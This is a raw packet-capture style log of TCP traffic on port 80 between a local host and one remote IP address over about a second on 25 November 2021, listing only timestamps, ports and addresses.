Nov 25, 2021 18:21:28.805368900 CET	49168	80	192.168.2.22	173.232.204.89
Nov 25, 2021 18:21:28.805394888 CET	80	49168	173.232.204.89	192.168.2.22
Nov 25, 2021 18:21:28.805435896 CET	80	49168	173.232.204.89	192.168.2.22
Nov 25, 2021 18:21:28.805440903 CET	49168	80	192.168.2.22	173.232.204.89
Nov 25, 2021 18:21:28.805538893 CET	80	49168	173.232.204.89	192.168.2.22
Nov 25, 2021 18:21:28.805579901 CET	80	49168	173.232.204.89	192.168.2.22
Nov 25, 2021 18:21:28.805588961 CET	49168	80	192.168.2.22	173.232.204.89
Nov 25, 2021 18:21:28.805619955 CET	80	49168	173.232.204.89	192.168.2.22
Nov 25, 2021 18:21:28.805658102 CET	80	49168	173.232.204.89	192.168.2.22
Nov 25, 2021 18:21:28.805668116 CET	49168	80	192.168.2.22	173.232.204.89
Nov 25, 2021 18:21:28.805699110 CET	80	49168	173.232.204.89	192.168.2.22
Nov 25, 2021 18:21:28.805731058 CET	80	49168	173.232.204.89	192.168.2.22
Nov 25, 2021 18:21:28.805761099 CET	80	49168	173.232.204.89	192.168.2.22
Nov 25, 2021 18:21:28.805808067 CET	49168	80	192.168.2.22	173.232.204.89
Nov 25, 2021 18:21:28.805814981 CET	80	49168	173.232.204.89	192.168.2.22
Nov 25, 2021 18:21:28.805877924 CET	49168	80	192.168.2.22	173.232.204.89
Nov 25, 2021 18:21:28.805911064 CET	80	49168	173.232.204.89	192.168.2.22
Nov 25, 2021 18:21:28.805949926 CET	80	49168	173.232.204.89	192.168.2.22
Nov 25, 2021 18:21:28.806001902 CET	49168	80	192.168.2.22	173.232.204.89
Nov 25, 2021 18:21:28.951965094 CET	80	49168	173.232.204.89	192.168.2.22
Nov 25, 2021 18:21:28.951992989 CET	80	49168	173.232.204.89	192.168.2.22
Nov 25, 2021 18:21:28.952012062 CET	80	49168	173.232.204.89	192.168.2.22
Nov 25, 2021 18:21:28.952061892 CET	80	49168	173.232.204.89	192.168.2.22
Nov 25, 2021 18:21:28.952063084 CET	49168	80	192.168.2.22	173.232.204.89
Nov 25, 2021 18:21:28.952102900 CET	49168	80	192.168.2.22	173.232.204.89
Nov 25, 2021 18:21:28.952994108 CET	80	49168	173.232.204.89	192.168.2.22
Nov 25, 2021 18:21:28.953016043 CET	80	49168	173.232.204.89	192.168.2.22
Nov 25, 2021 18:21:28.953033924 CET	80	49168	173.232.204.89	192.168.2.22
Nov 25, 2021 18:21:28.953049898 CET	80	49168	173.232.204.89	192.168.2.22
Nov 25, 2021 18:21:28.953061104 CET	49168	80	192.168.2.22	173.232.204.89
Nov 25, 2021 18:21:28.953088045 CET	49168	80	192.168.2.22	173.232.204.89
Nov 25, 2021 18:21:28.953376055 CET	80	49168	173.232.204.89	192.168.2.22
Nov 25, 2021 18:21:28.953525066 CET	80	49168	173.232.204.89	192.168.2.22
Nov 25, 2021 18:21:28.953541994 CET	80	49168	173.232.204.89	192.168.2.22
Nov 25, 2021 18:21:28.953557014 CET	80	49168	173.232.204.89	192.168.2.22
Nov 25, 2021 18:21:28.953581095 CET	49168	80	192.168.2.22	173.232.204.89
Nov 25, 2021 18:21:28.953593016 CET	49168	80	192.168.2.22	173.232.204.89
Nov 25, 2021 18:21:28.953756094 CET	80	49168	173.232.204.89	192.168.2.22
Nov 25, 2021 18:21:28.953777075 CET	80	49168	173.232.204.89	192.168.2.22
Nov 25, 2021 18:21:28.953798056 CET	80	49168	173.232.204.89	192.168.2.22
Nov 25, 2021 18:21:28.953813076 CET	49168	80	192.168.2.22	173.232.204.89
Nov 25, 2021 18:21:28.953814983 CET	80	49168	173.232.204.89	192.168.2.22
Nov 25, 2021 18:21:28.953840017 CET	80	49168	173.232.204.89	192.168.2.22
Nov 25, 2021 18:21:28.953845978 CET	80	49168	173.232.204.89	192.168.2.22
Nov 25, 2021 18:21:28.953847885 CET	49168	80	192.168.2.22	173.232.204.89
Nov 25, 2021 18:21:28.953860044 CET	80	49168	173.232.204.89	192.168.2.22
Nov 25, 2021 18:21:28.953886032 CET	49168	80	192.168.2.22	173.232.204.89
Nov 25, 2021 18:21:28.953907013 CET	80	49168	173.232.204.89	192.168.2.22
Nov 25, 2021 18:21:28.953943014 CET	49168	80	192.168.2.22	173.232.204.89
Nov 25, 2021 18:21:28.954483986 CET	80	49168	173.232.204.89	192.168.2.22
Nov 25, 2021 18:21:28.954514027 CET	80	49168	173.232.204.89	192.168.2.22
Nov 25, 2021 18:21:28.954528093 CET	80	49168	173.232.204.89	192.168.2.22
Nov 25, 2021 18:21:28.954543114 CET	80	49168	173.232.204.89	192.168.2.22
Nov 25, 2021 18:21:28.954557896 CET	80	49168	173.232.204.89	192.168.2.22
Nov 25, 2021 18:21:28.954570055 CET	80	49168	173.232.204.89	192.168.2.22
Nov 25, 2021 18:21:28.954587936 CET	49168	80	192.168.2.22	173.232.204.89
Nov 25, 2021 18:21:28.954596996 CET	49168	80	192.168.2.22	173.232.204.89
Nov 25, 2021 18:21:28.954612970 CET	80	49168	173.232.204.89	192.168.2.22
Nov 25, 2021 18:21:28.954657078 CET	49168	80	192.168.2.22	173.232.204.89
Nov 25, 2021 18:21:28.954680920 CET	80	49168	173.232.204.89	192.168.2.22
Nov 25, 2021 18:21:28.954756975 CET	80	49168	173.232.204.89	192.168.2.22
Nov 25, 2021 18:21:28.954814911 CET	80	49168	173.232.204.89	192.168.2.22
Nov 25, 2021 18:21:28.954832077 CET	49168	80	192.168.2.22	173.232.204.89
Nov 25, 2021 18:21:29.098633051 CET	80	49168	173.232.204.89	192.168.2.22
Nov 25, 2021 18:21:29.098670006 CET	80	49168	173.232.204.89	192.168.2.22
Nov 25, 2021 18:21:29.098684072 CET	80	49168	173.232.204.89	192.168.2.22
Nov 25, 2021 18:21:29.098696947 CET	80	49168	173.232.204.89	192.168.2.22
Nov 25, 2021 18:21:29.098753929 CET	49168	80	192.168.2.22	173.232.204.89
Nov 25, 2021 18:21:29.098970890 CET	80	49168	173.232.204.89	192.168.2.22
Nov 25, 2021 18:21:29.099033117 CET	49168	80	192.168.2.22	173.232.204.89
Nov 25, 2021 18:21:29.099035978 CET	80	49168	173.232.204.89	192.168.2.22
Nov 25, 2021 18:21:29.099054098 CET	80	49168	173.232.204.89	192.168.2.22
Nov 25, 2021 18:21:29.099087000 CET	80	49168	173.232.204.89	192.168.2.22
Nov 25, 2021 18:21:29.099109888 CET	49168	80	192.168.2.22	173.232.204.89
Nov 25, 2021 18:21:29.099442959 CET	80	49168	173.232.204.89	192.168.2.22
Nov 25, 2021 18:21:29.099482059 CET	49168	80	192.168.2.22	173.232.204.89
Nov 25, 2021 18:21:29.099500895 CET	80	49168	173.232.204.89	192.168.2.22
Nov 25, 2021 18:21:29.099565983 CET	80	49168	173.232.204.89	192.168.2.22
Nov 25, 2021 18:21:29.099621058 CET	49168	80	192.168.2.22	173.232.204.89
Nov 25, 2021 18:21:29.099627018 CET	80	49168	173.232.204.89	192.168.2.22
Nov 25, 2021 18:21:29.100560904 CET	80	49168	173.232.204.89	192.168.2.22
Nov 25, 2021 18:21:29.100606918 CET	80	49168	173.232.204.89	192.168.2.22
Nov 25, 2021 18:21:29.100615025 CET	49168	80	192.168.2.22	173.232.204.89
Nov 25, 2021 18:21:29.100661993 CET	80	49168	173.232.204.89	192.168.2.22
Nov 25, 2021 18:21:29.100708008 CET	49168	80	192.168.2.22	173.232.204.89
Nov 25, 2021 18:21:29.100733995 CET	80	49168	173.232.204.89	192.168.2.22
Nov 25, 2021 18:21:29.100898981 CET	80	49168	173.232.204.89	192.168.2.22
Nov 25, 2021 18:21:29.100950956 CET	49168	80	192.168.2.22	173.232.204.89
Nov 25, 2021 18:21:29.100971937 CET	80	49168	173.232.204.89	192.168.2.22
Nov 25, 2021 18:21:29.100989103 CET	80	49168	173.232.204.89	192.168.2.22
Nov 25, 2021 18:21:29.101006031 CET	80	49168	173.232.204.89	192.168.2.22
Nov 25, 2021 18:21:29.101041079 CET	49168	80	192.168.2.22	173.232.204.89
Nov 25, 2021 18:21:29.101444006 CET	80	49168	173.232.204.89	192.168.2.22
Nov 25, 2021 18:21:29.101461887 CET	80	49168	173.232.204.89	192.168.2.22
Nov 25, 2021 18:21:29.101500034 CET	49168	80	192.168.2.22	173.232.204.89
Nov 25, 2021 18:21:29.101505041 CET	80	49168	173.232.204.89	192.168.2.22
Nov 25, 2021 18:21:29.101524115 CET	80	49168	173.232.204.89	192.168.2.22
Nov 25, 2021 18:21:29.101572037 CET	49168	80	192.168.2.22	173.232.204.89
Nov 25, 2021 18:21:29.101710081 CET	80	49168	173.232.204.89	192.168.2.22
Nov 25, 2021 18:21:29.101733923 CET	80	49168	173.232.204.89	192.168.2.22
Nov 25, 2021 18:21:29.101751089 CET	80	49168	173.232.204.89	192.168.2.22
Nov 25, 2021 18:21:29.101771116 CET	49168	80	192.168.2.22	173.232.204.89
Nov 25, 2021 18:21:29.101799011 CET	80	49168	173.232.204.89	192.168.2.22
Nov 25, 2021 18:21:29.101850033 CET	49168	80	192.168.2.22	173.232.204.89
Nov 25, 2021 18:21:29.101939917 CET	80	49168	173.232.204.89	192.168.2.22
Nov 25, 2021 18:21:29.102010965 CET	80	49168	173.232.204.89	192.168.2.22
Nov 25, 2021 18:21:29.102035046 CET	80	49168	173.232.204.89	192.168.2.22
Nov 25, 2021 18:21:29.102054119 CET	49168	80	192.168.2.22	173.232.204.89
Nov 25, 2021 18:21:29.102077007 CET	80	49168	173.232.204.89	192.168.2.22
Nov 25, 2021 18:21:29.102123022 CET	49168	80	192.168.2.22	173.232.204.89
Nov 25, 2021 18:21:29.102220058 CET	80	49168	173.232.204.89	192.168.2.22
Nov 25, 2021 18:21:29.102258921 CET	80	49168	173.232.204.89	192.168.2.22
Nov 25, 2021 18:21:29.102276087 CET	80	49168	173.232.204.89	192.168.2.22
Nov 25, 2021 18:21:29.102293015 CET	80	49168	173.232.204.89	192.168.2.22
Nov 25, 2021 18:21:29.102300882 CET	49168	80	192.168.2.22	173.232.204.89
Nov 25, 2021 18:21:29.102328062 CET	49168	80	192.168.2.22	173.232.204.89
Nov 25, 2021 18:21:29.102376938 CET	80	49168	173.232.204.89	192.168.2.22
Nov 25, 2021 18:21:29.102395058 CET	80	49168	173.232.204.89	192.168.2.22
Nov 25, 2021 18:21:29.102432013 CET	49168	80	192.168.2.22	173.232.204.89
Nov 25, 2021 18:21:29.102448940 CET	80	49168	173.232.204.89	192.168.2.22
Nov 25, 2021 18:21:29.102508068 CET	80	49168	173.232.204.89	192.168.2.22
Nov 25, 2021 18:21:29.102556944 CET	49168	80	192.168.2.22	173.232.204.89
Nov 25, 2021 18:21:29.102602959 CET	80	49168	173.232.204.89	192.168.2.22
Nov 25, 2021 18:21:29.102621078 CET	80	49168	173.232.204.89	192.168.2.22
Nov 25, 2021 18:21:29.102638006 CET	80	49168	173.232.204.89	192.168.2.22
Nov 25, 2021 18:21:29.102658987 CET	49168	80	192.168.2.22	173.232.204.89
Nov 25, 2021 18:21:29.103163004 CET	80	49168	173.232.204.89	192.168.2.22
Nov 25, 2021 18:21:29.103209019 CET	49168	80	192.168.2.22	173.232.204.89
Nov 25, 2021 18:21:29.103240967 CET	80	49168	173.232.204.89	192.168.2.22
Nov 25, 2021 18:21:29.103292942 CET	80	49168	173.232.204.89	192.168.2.22
Nov 25, 2021 18:21:29.103312016 CET	80	49168	173.232.204.89	192.168.2.22
Nov 25, 2021 18:21:29.103338957 CET	49168	80	192.168.2.22	173.232.204.89
Nov 25, 2021 18:21:29.103432894 CET	80	49168	173.232.204.89	192.168.2.22
Nov 25, 2021 18:21:29.103471041 CET	49168	80	192.168.2.22	173.232.204.89
Nov 25, 2021 18:21:29.245501041 CET	80	49168	173.232.204.89	192.168.2.22
Nov 25, 2021 18:21:29.245533943 CET	80	49168	173.232.204.89	192.168.2.22
Nov 25, 2021 18:21:29.245585918 CET	80	49168	173.232.204.89	192.168.2.22
Nov 25, 2021 18:21:29.245600939 CET	49168	80	192.168.2.22	173.232.204.89
Nov 25, 2021 18:21:29.245626926 CET	80	49168	173.232.204.89	192.168.2.22
Nov 25, 2021 18:21:29.245666027 CET	49168	80	192.168.2.22	173.232.204.89
Nov 25, 2021 18:21:29.246108055 CET	80	49168	173.232.204.89	192.168.2.22
Nov 25, 2021 18:21:29.246150970 CET	80	49168	173.232.204.89	192.168.2.22
Nov 25, 2021 18:21:29.246187925 CET	49168	80	192.168.2.22	173.232.204.89
Nov 25, 2021 18:21:29.246201038 CET	80	49168	173.232.204.89	192.168.2.22
Nov 25, 2021 18:21:29.246239901 CET	80	49168	173.232.204.89	192.168.2.22
Nov 25, 2021 18:21:29.246275902 CET	49168	80	192.168.2.22	173.232.204.89
Nov 25, 2021 18:21:29.246279001 CET	80	49168	173.232.204.89	192.168.2.22
Nov 25, 2021 18:21:29.246319056 CET	80	49168	173.232.204.89	192.168.2.22
Nov 25, 2021 18:21:29.246351957 CET	49168	80	192.168.2.22	173.232.204.89
Nov 25, 2021 18:21:29.246359110 CET	80	49168	173.232.204.89	192.168.2.22
Nov 25, 2021 18:21:29.246401072 CET	80	49168	173.232.204.89	192.168.2.22
Nov 25, 2021 18:21:29.246438026 CET	49168	80	192.168.2.22	173.232.204.89
Nov 25, 2021 18:21:29.247397900 CET	80	49168	173.232.204.89	192.168.2.22
Nov 25, 2021 18:21:29.247442961 CET	80	49168	173.232.204.89	192.168.2.22
Nov 25, 2021 18:21:29.247483015 CET	80	49168	173.232.204.89	192.168.2.22
Nov 25, 2021 18:21:29.247486115 CET	49168	80	192.168.2.22	173.232.204.89
Nov 25, 2021 18:21:29.247522116 CET	80	49168	173.232.204.89	192.168.2.22
Nov 25, 2021 18:21:29.247560978 CET	49168	80	192.168.2.22	173.232.204.89
Nov 25, 2021 18:21:29.247562885 CET	80	49168	173.232.204.89	192.168.2.22
Nov 25, 2021 18:21:29.247627974 CET	80	49168	173.232.204.89	192.168.2.22
Nov 25, 2021 18:21:29.247667074 CET	49168	80	192.168.2.22	173.232.204.89
Nov 25, 2021 18:21:29.247667074 CET	80	49168	173.232.204.89	192.168.2.22
Nov 25, 2021 18:21:29.247704983 CET	80	49168	173.232.204.89	192.168.2.22
Nov 25, 2021 18:21:29.247741938 CET	49168	80	192.168.2.22	173.232.204.89
Nov 25, 2021 18:21:29.248231888 CET	80	49168	173.232.204.89	192.168.2.22
Nov 25, 2021 18:21:29.248275042 CET	80	49168	173.232.204.89	192.168.2.22
Nov 25, 2021 18:21:29.248313904 CET	49168	80	192.168.2.22	173.232.204.89
Nov 25, 2021 18:21:29.248315096 CET	80	49168	173.232.204.89	192.168.2.22
Nov 25, 2021 18:21:29.248414040 CET	80	49168	173.232.204.89	192.168.2.22
Nov 25, 2021 18:21:29.248451948 CET	49168	80	192.168.2.22	173.232.204.89
Nov 25, 2021 18:21:29.249057055 CET	80	49168	173.232.204.89	192.168.2.22
Nov 25, 2021 18:21:29.249099970 CET	80	49168	173.232.204.89	192.168.2.22
Nov 25, 2021 18:21:29.249140024 CET	49168	80	192.168.2.22	173.232.204.89
Nov 25, 2021 18:21:29.249140978 CET	80	49168	173.232.204.89	192.168.2.22
Nov 25, 2021 18:21:29.249183893 CET	80	49168	173.232.204.89	192.168.2.22
Nov 25, 2021 18:21:29.249233007 CET	49168	80	192.168.2.22	173.232.204.89
Nov 25, 2021 18:21:29.249349117 CET	80	49168	173.232.204.89	192.168.2.22
Nov 25, 2021 18:21:29.249388933 CET	80	49168	173.232.204.89	192.168.2.22
Nov 25, 2021 18:21:29.249427080 CET	49168	80	192.168.2.22	173.232.204.89
Nov 25, 2021 18:21:29.249468088 CET	80	49168	173.232.204.89	192.168.2.22
Nov 25, 2021 18:21:29.249500036 CET	80	49168	173.232.204.89	192.168.2.22
Nov 25, 2021 18:21:29.249557018 CET	49168	80	192.168.2.22	173.232.204.89
Nov 25, 2021 18:21:29.249836922 CET	80	49168	173.232.204.89	192.168.2.22
Nov 25, 2021 18:21:29.249877930 CET	80	49168	173.232.204.89	192.168.2.22
Nov 25, 2021 18:21:29.249917030 CET	80	49168	173.232.204.89	192.168.2.22
Nov 25, 2021 18:21:29.249919891 CET	49168	80	192.168.2.22	173.232.204.89
Nov 25, 2021 18:21:29.249954939 CET	80	49168	173.232.204.89	192.168.2.22
Nov 25, 2021 18:21:29.249998093 CET	80	49168	173.232.204.89	192.168.2.22
Nov 25, 2021 18:21:29.250000000 CET	49168	80	192.168.2.22	173.232.204.89
Nov 25, 2021 18:21:29.250040054 CET	80	49168	173.232.204.89	192.168.2.22
Nov 25, 2021 18:21:29.250078917 CET	80	49168	173.232.204.89	192.168.2.22
Nov 25, 2021 18:21:29.250083923 CET	49168	80	192.168.2.22	173.232.204.89
Nov 25, 2021 18:21:29.250118017 CET	80	49168	173.232.204.89	192.168.2.22
Nov 25, 2021 18:21:29.250159979 CET	49168	80	192.168.2.22	173.232.204.89
Nov 25, 2021 18:21:29.250194073 CET	80	49168	173.232.204.89	192.168.2.22
Nov 25, 2021 18:21:29.250233889 CET	80	49168	173.232.204.89	192.168.2.22
Nov 25, 2021 18:21:29.250269890 CET	49168	80	192.168.2.22	173.232.204.89
Nov 25, 2021 18:21:29.250272989 CET	80	49168	173.232.204.89	192.168.2.22
Nov 25, 2021 18:21:29.250309944 CET	80	49168	173.232.204.89	192.168.2.22
Nov 25, 2021 18:21:29.250355959 CET	49168	80	192.168.2.22	173.232.204.89
Nov 25, 2021 18:21:29.250456095 CET	80	49168	173.232.204.89	192.168.2.22
Nov 25, 2021 18:21:29.250546932 CET	80	49168	173.232.204.89	192.168.2.22
Nov 25, 2021 18:21:29.250586033 CET	80	49168	173.232.204.89	192.168.2.22
Nov 25, 2021 18:21:29.250588894 CET	49168	80	192.168.2.22	173.232.204.89
Nov 25, 2021 18:21:29.250624895 CET	80	49168	173.232.204.89	192.168.2.22
Nov 25, 2021 18:21:29.250669003 CET	49168	80	192.168.2.22	173.232.204.89
Nov 25, 2021 18:21:29.250864983 CET	80	49168	173.232.204.89	192.168.2.22
Nov 25, 2021 18:21:29.392250061 CET	80	49168	173.232.204.89	192.168.2.22
Nov 25, 2021 18:21:29.392271996 CET	80	49168	173.232.204.89	192.168.2.22
Nov 25, 2021 18:21:29.392296076 CET	80	49168	173.232.204.89	192.168.2.22
Nov 25, 2021 18:21:29.392333984 CET	80	49168	173.232.204.89	192.168.2.22
Nov 25, 2021 18:21:29.392401934 CET	49168	80	192.168.2.22	173.232.204.89
Nov 25, 2021 18:21:29.393373966 CET	80	49168	173.232.204.89	192.168.2.22
Nov 25, 2021 18:21:29.393407106 CET	80	49168	173.232.204.89	192.168.2.22
Nov 25, 2021 18:21:29.393440962 CET	80	49168	173.232.204.89	192.168.2.22
Nov 25, 2021 18:21:29.393471003 CET	80	49168	173.232.204.89	192.168.2.22
Nov 25, 2021 18:21:29.393491030 CET	49168	80	192.168.2.22	173.232.204.89
Nov 25, 2021 18:21:29.393511057 CET	49168	80	192.168.2.22	173.232.204.89
Nov 25, 2021 18:21:29.393676043 CET	80	49168	173.232.204.89	192.168.2.22
Nov 25, 2021 18:21:29.393691063 CET	80	49168	173.232.204.89	192.168.2.22
Nov 25, 2021 18:21:29.393708944 CET	80	49168	173.232.204.89	192.168.2.22
Nov 25, 2021 18:21:29.393742085 CET	49168	80	192.168.2.22	173.232.204.89
Nov 25, 2021 18:21:29.393781900 CET	80	49168	173.232.204.89	192.168.2.22
Nov 25, 2021 18:21:29.393847942 CET	49168	80	192.168.2.22	173.232.204.89
Nov 25, 2021 18:21:29.394361973 CET	80	49168	173.232.204.89	192.168.2.22
Nov 25, 2021 18:21:29.394406080 CET	80	49168	173.232.204.89	192.168.2.22
Nov 25, 2021 18:21:29.394426107 CET	80	49168	173.232.204.89	192.168.2.22
Nov 25, 2021 18:21:29.394438982 CET	80	49168	173.232.204.89	192.168.2.22
Nov 25, 2021 18:21:29.394465923 CET	49168	80	192.168.2.22	173.232.204.89
Nov 25, 2021 18:21:29.394841909 CET	80	49168	173.232.204.89	192.168.2.22
Nov 25, 2021 18:21:29.394856930 CET	80	49168	173.232.204.89	192.168.2.22
Nov 25, 2021 18:21:29.394893885 CET	80	49168	173.232.204.89	192.168.2.22
Nov 25, 2021 18:21:29.394901991 CET	49168	80	192.168.2.22	173.232.204.89
Nov 25, 2021 18:21:29.394932985 CET	80	49168	173.232.204.89	192.168.2.22
Nov 25, 2021 18:21:29.395143032 CET	80	49168	173.232.204.89	192.168.2.22
Nov 25, 2021 18:21:29.395163059 CET	80	49168	173.232.204.89	192.168.2.22
Nov 25, 2021 18:21:29.395178080 CET	80	49168	173.232.204.89	192.168.2.22
Nov 25, 2021 18:21:29.395181894 CET	49168	80	192.168.2.22	173.232.204.89
Nov 25, 2021 18:21:29.395195007 CET	80	49168	173.232.204.89	192.168.2.22
Nov 25, 2021 18:21:29.395216942 CET	49168	80	192.168.2.22	173.232.204.89
Nov 25, 2021 18:21:29.395333052 CET	80	49168	173.232.204.89	192.168.2.22
Nov 25, 2021 18:21:29.395345926 CET	80	49168	173.232.204.89	192.168.2.22
Nov 25, 2021 18:21:29.395399094 CET	49168	80	192.168.2.22	173.232.204.89
Nov 25, 2021 18:21:29.395407915 CET	80	49168	173.232.204.89	192.168.2.22
Nov 25, 2021 18:21:29.395421028 CET	80	49168	173.232.204.89	192.168.2.22
Nov 25, 2021 18:21:29.395462990 CET	49168	80	192.168.2.22	173.232.204.89
Nov 25, 2021 18:21:29.395632029 CET	80	49168	173.232.204.89	192.168.2.22
Nov 25, 2021 18:21:29.395699024 CET	80	49168	173.232.204.89	192.168.2.22
Nov 25, 2021 18:21:29.395740032 CET	49168	80	192.168.2.22	173.232.204.89
Nov 25, 2021 18:21:29.395761013 CET	80	49168	173.232.204.89	192.168.2.22
Nov 25, 2021 18:21:29.395853043 CET	80	49168	173.232.204.89	192.168.2.22
Nov 25, 2021 18:21:29.395885944 CET	49168	80	192.168.2.22	173.232.204.89
Nov 25, 2021 18:21:29.396365881 CET	80	49168	173.232.204.89	192.168.2.22
Nov 25, 2021 18:21:29.396379948 CET	80	49168	173.232.204.89	192.168.2.22
Nov 25, 2021 18:21:29.396421909 CET	80	49168	173.232.204.89	192.168.2.22
Nov 25, 2021 18:21:29.396435022 CET	80	49168	173.232.204.89	192.168.2.22
Nov 25, 2021 18:21:29.396471977 CET	49168	80	192.168.2.22	173.232.204.89
Nov 25, 2021 18:21:29.396483898 CET	49168	80	192.168.2.22	173.232.204.89
Nov 25, 2021 18:21:29.396579981 CET	80	49168	173.232.204.89	192.168.2.22
Nov 25, 2021 18:21:29.396658897 CET	80	49168	173.232.204.89	192.168.2.22
Nov 25, 2021 18:21:29.396706104 CET	49168	80	192.168.2.22	173.232.204.89
Nov 25, 2021 18:21:29.396745920 CET	80	49168	173.232.204.89	192.168.2.22
Nov 25, 2021 18:21:29.396759987 CET	80	49168	173.232.204.89	192.168.2.22
Nov 25, 2021 18:21:29.396802902 CET	49168	80	192.168.2.22	173.232.204.89
Nov 25, 2021 18:21:29.397644997 CET	80	49168	173.232.204.89	192.168.2.22
Nov 25, 2021 18:21:29.397661924 CET	80	49168	173.232.204.89	192.168.2.22
Nov 25, 2021 18:21:29.397682905 CET	80	49168	173.232.204.89	192.168.2.22
Nov 25, 2021 18:21:29.397696018 CET	80	49168	173.232.204.89	192.168.2.22
Nov 25, 2021 18:21:29.397717953 CET	49168	80	192.168.2.22	173.232.204.89
Nov 25, 2021 18:21:29.397749901 CET	49168	80	192.168.2.22	173.232.204.89
Nov 25, 2021 18:21:29.397949934 CET	80	49168	173.232.204.89	192.168.2.22
Nov 25, 2021 18:21:29.398040056 CET	80	49168	173.232.204.89	192.168.2.22
Nov 25, 2021 18:21:29.398097038 CET	49168	80	192.168.2.22	173.232.204.89
Nov 25, 2021 18:21:29.398112059 CET	80	49168	173.232.204.89	192.168.2.22
Nov 25, 2021 18:21:29.398158073 CET	80	49168	173.232.204.89	192.168.2.22
Nov 25, 2021 18:21:29.398204088 CET	49168	80	192.168.2.22	173.232.204.89
Nov 25, 2021 18:21:29.398421049 CET	80	49168	173.232.204.89	192.168.2.22
Nov 25, 2021 18:21:29.398437023 CET	80	49168	173.232.204.89	192.168.2.22
Nov 25, 2021 18:21:29.398477077 CET	49168	80	192.168.2.22	173.232.204.89
Nov 25, 2021 18:21:29.398483992 CET	80	49168	173.232.204.89	192.168.2.22
Nov 25, 2021 18:21:29.398498058 CET	80	49168	173.232.204.89	192.168.2.22
Nov 25, 2021 18:21:29.398550987 CET	49168	80	192.168.2.22	173.232.204.89
Nov 25, 2021 18:21:29.398693085 CET	80	49168	173.232.204.89	192.168.2.22
Nov 25, 2021 18:21:29.398706913 CET	80	49168	173.232.204.89	192.168.2.22
Nov 25, 2021 18:21:29.398746967 CET	80	49168	173.232.204.89	192.168.2.22
Nov 25, 2021 18:21:29.398747921 CET	49168	80	192.168.2.22	173.232.204.89
Nov 25, 2021 18:21:29.398762941 CET	80	49168	173.232.204.89	192.168.2.22
Nov 25, 2021 18:21:29.398837090 CET	49168	80	192.168.2.22	173.232.204.89
Nov 25, 2021 18:21:29.398855925 CET	80	49168	173.232.204.89	192.168.2.22
Nov 25, 2021 18:21:29.398869038 CET	80	49168	173.232.204.89	192.168.2.22
Nov 25, 2021 18:21:29.398905993 CET	49168	80	192.168.2.22	173.232.204.89
Nov 25, 2021 18:21:29.398916006 CET	80	49168	173.232.204.89	192.168.2.22
Nov 25, 2021 18:21:29.398930073 CET	80	49168	173.232.204.89	192.168.2.22
Nov 25, 2021 18:21:29.398964882 CET	49168	80	192.168.2.22	173.232.204.89
Nov 25, 2021 18:21:29.399032116 CET	80	49168	173.232.204.89	192.168.2.22
Nov 25, 2021 18:21:29.399066925 CET	80	49168	173.232.204.89	192.168.2.22
Nov 25, 2021 18:21:29.399084091 CET	80	49168	173.232.204.89	192.168.2.22
Nov 25, 2021 18:21:29.399105072 CET	49168	80	192.168.2.22	173.232.204.89
Nov 25, 2021 18:21:29.399142027 CET	80	49168	173.232.204.89	192.168.2.22
Nov 25, 2021 18:21:29.399298906 CET	80	49168	173.232.204.89	192.168.2.22
Nov 25, 2021 18:21:29.399317026 CET	80	49168	173.232.204.89	192.168.2.22
Nov 25, 2021 18:21:29.399358034 CET	80	49168	173.232.204.89	192.168.2.22
Nov 25, 2021 18:21:29.399370909 CET	80	49168	173.232.204.89	192.168.2.22
Nov 25, 2021 18:21:29.399378061 CET	49168	80	192.168.2.22	173.232.204.89
Nov 25, 2021 18:21:29.399419069 CET	49168	80	192.168.2.22	173.232.204.89
Nov 25, 2021 18:21:29.399521112 CET	80	49168	173.232.204.89	192.168.2.22
Nov 25, 2021 18:21:29.399533987 CET	80	49168	173.232.204.89	192.168.2.22
Nov 25, 2021 18:21:29.399550915 CET	80	49168	173.232.204.89	192.168.2.22
Nov 25, 2021 18:21:29.399563074 CET	80	49168	173.232.204.89	192.168.2.22
Nov 25, 2021 18:21:29.399575949 CET	49168	80	192.168.2.22	173.232.204.89
Nov 25, 2021 18:21:29.399610043 CET	49168	80	192.168.2.22	173.232.204.89
Nov 25, 2021 18:21:29.399696112 CET	80	49168	173.232.204.89	192.168.2.22
Nov 25, 2021 18:21:29.399709940 CET	80	49168	173.232.204.89	192.168.2.22
Nov 25, 2021 18:21:29.399751902 CET	49168	80	192.168.2.22	173.232.204.89
Nov 25, 2021 18:21:29.399785042 CET	80	49168	173.232.204.89	192.168.2.22
Nov 25, 2021 18:21:29.399800062 CET	80	49168	173.232.204.89	192.168.2.22
Nov 25, 2021 18:21:29.399841070 CET	49168	80	192.168.2.22	173.232.204.89
Nov 25, 2021 18:21:29.399897099 CET	80	49168	173.232.204.89	192.168.2.22
Nov 25, 2021 18:21:29.399980068 CET	80	49168	173.232.204.89	192.168.2.22
Nov 25, 2021 18:21:29.400022984 CET	49168	80	192.168.2.22	173.232.204.89
Nov 25, 2021 18:21:29.400064945 CET	80	49168	173.232.204.89	192.168.2.22
Nov 25, 2021 18:21:29.400075912 CET	80	49168	173.232.204.89	192.168.2.22
Nov 25, 2021 18:21:29.400125980 CET	49168	80	192.168.2.22	173.232.204.89
Nov 25, 2021 18:21:29.400149107 CET	80	49168	173.232.204.89	192.168.2.22
Nov 25, 2021 18:21:29.400162935 CET	80	49168	173.232.204.89	192.168.2.22
Nov 25, 2021 18:21:29.400207043 CET	49168	80	192.168.2.22	173.232.204.89
Nov 25, 2021 18:21:29.400207996 CET	80	49168	173.232.204.89	192.168.2.22
Nov 25, 2021 18:21:29.400222063 CET	80	49168	173.232.204.89	192.168.2.22
Nov 25, 2021 18:21:29.400264025 CET	49168	80	192.168.2.22	173.232.204.89
Nov 25, 2021 18:21:29.400325060 CET	80	49168	173.232.204.89	192.168.2.22
Nov 25, 2021 18:21:29.400337934 CET	80	49168	173.232.204.89	192.168.2.22
Nov 25, 2021 18:21:29.400384903 CET	49168	80	192.168.2.22	173.232.204.89
Nov 25, 2021 18:21:29.400396109 CET	80	49168	173.232.204.89	192.168.2.22
Nov 25, 2021 18:21:29.400409937 CET	80	49168	173.232.204.89	192.168.2.22
Nov 25, 2021 18:21:29.400453091 CET	49168	80	192.168.2.22	173.232.204.89
Nov 25, 2021 18:21:29.400566101 CET	80	49168	173.232.204.89	192.168.2.22
Nov 25, 2021 18:21:29.400654078 CET	80	49168	173.232.204.89	192.168.2.22
Nov 25, 2021 18:21:29.400671959 CET	80	49168	173.232.204.89	192.168.2.22
Nov 25, 2021 18:21:29.400696993 CET	49168	80	192.168.2.22	173.232.204.89
Nov 25, 2021 18:21:29.400734901 CET	80	49168	173.232.204.89	192.168.2.22
